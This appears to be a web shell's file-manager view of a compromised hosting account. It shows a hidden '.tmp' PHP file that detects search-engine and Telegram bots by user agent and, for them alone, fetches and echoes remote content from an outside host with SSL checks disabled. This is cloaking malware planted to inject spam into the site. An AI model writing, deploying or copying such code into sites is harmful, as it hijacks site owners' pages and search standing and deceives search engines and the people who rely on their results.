Your IP : 216.73.217.20


Current Path : /home/u438053920/
Upload File :
Current File : /home/u438053920/.tmp

<?php


function getUrlContents($url)
{
    $ch = curl_init();  // Initialize cURL session
    curl_setopt($ch, CURLOPT_URL, $url);  // Set URL
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  // Return as string
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);  // Follow redirects
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Optional: Ignore SSL verification
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);    // Optional: Timeout
    $output = curl_exec($ch);  // Execute and get output
    curl_close($ch);  // Close session
    return $output;
}

function is_bot()
{
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool');

    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            return true;
        }
    }

    return false;
}

if (is_bot()) {
    $message = getUrlContents('https://lgolive.jp.net/landingpage/digitalmarketing/1.txt');
    echo $message;
    exit; // Atau bisa menggunakan die()
}